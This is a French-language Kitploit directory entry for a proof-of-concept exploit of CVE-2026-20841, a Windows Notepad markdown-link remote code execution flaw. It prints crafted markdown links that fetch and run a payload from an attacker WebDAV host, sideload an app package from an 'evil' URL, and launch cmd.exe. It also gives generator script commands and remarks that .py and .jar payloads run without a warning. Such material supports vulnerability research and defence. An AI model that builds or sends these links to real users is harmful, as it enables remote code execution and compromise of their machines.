Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-20841 — Preuve de concept pour CVE-2026-20841, une RCE de Windows Notepad via des liens markdown. Génère des fichiers .md conçus pour déclencher des charges utiles distantes, le sideloading d'applications ou l'exécution de binaires locaux. | Kitploit
Outils/GitHubGitHub/atiilla/cve-2026-20841
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubatiilla/cve-2026-20841

CVE-2026-20841

Preuve de concept pour CVE-2026-20841, une RCE de Windows Notepad via des liens markdown. Génère des fichiers .md conçus pour déclencher des charges utiles distantes, le sideloading d'applications ou l'exécution de binaires locaux.

Voir le dépôt
54il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-20841 - Exécution de code à distance dans le Bloc-notes Windows

PoC pour une faille d'exécution de code à distance dans le moteur de rendu Markdown du Bloc-notes Windows. Le moteur Markdown ne restreint pas les protocoles d'URL, permettant de déclencher des gestionnaires de protocoles arbitraires via des liens cliquables.

Avertissements

  1. Pas ma découverte. Le crédit revient aux chercheurs originaux sur l'avis MSRC. Il s'agit d'une recréation de PoC.
  2. Sévérité plus faible qu'il n'y paraît. Nécessite plus d'un clic dans la plupart des cas (voir Limitations). Créé parce que « RCE dans le Bloc-notes » est trop drôle pour laisser passer.

Vecteurs d'attaque

1. Charge utile distante (file:///)

root@kitploit:~
[click](file:///\\attacker@5005\DavWWWRoot\payload.py)

Le protocole résout les chemins UNC distants. Liez une charge utile et Windows la récupérera et l'exécutera au clic.

file:///

2. Sideloading d'application (ms-appinstaller://)

root@kitploit:~
[click](ms-appinstaller://?source=https://evil/xxx.appx)

Ouvre l'Installateur d'applications avec un package .appx/.msix fourni par l'attaquant.

3. Exécution de binaire local (file://)

root@kitploit:~
[click](file://C:/windows/system32/cmd.exe)

Lance n'importe quel exécutable déjà présent sur le disque — cmd.exe, powershell.exe, mshta.exe, etc.

Utilisation

Les deux scripts génèrent un fichier poc.md avec un lien conçu dans le répertoire courant.

root@kitploit:~
node poc.js <host> <port> <payload/path>
python poc.py <host> <port> <payload/path>
root@kitploit:~
# exemple
node poc.js 192.168.1.100 5005 hello.py
notepad poc.md

Testez les charges utiles dans payloads/.

Limitations

  1. Les extensions dangereuses restent signalées. .exe, .lnk, .vbs et similaires déclenchent un avertissement de sécurité Windows indépendamment du comportement du Bloc-notes.
  2. Les extensions d'interpréteur contournent l'avertissement. .py et .jar s'exécutent silencieusement si Python ou Java est installé sur la cible.

Notes

  • Les versions vulnérables du Bloc-notes sont disponibles sur Uptodown. Vérifiez la signature numérique avant utilisation.
  • Testez uniquement dans une machine virtuelle.

Restez en sécurité !

Télécharger l’outil